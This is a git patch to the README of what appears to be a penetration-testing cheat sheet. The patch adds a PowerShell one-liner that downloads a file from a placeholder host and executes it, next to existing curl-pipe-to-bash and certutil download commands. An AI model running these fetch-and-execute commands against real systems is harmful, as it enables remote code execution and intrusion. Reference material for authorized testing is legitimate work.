From 70186daff9ece0c782bb625ca7b2c318dfda4031 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 1 Sep 2022 11:59:19 -0400 Subject: [PATCH] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 78bccaa..724e8ae 100644 --- a/README.md +++ b/README.md @@ -730,6 +730,9 @@ curl {IP ADDRESS}/{FILE} # Linux - Download file and execute in bash: curl {IP ADDRESS}/{FILE.sh} | bash +# Windows - Download file and execute in powershell: +powershell -c 'IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/{FILE}")' + # Windows - Download file using certutil certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}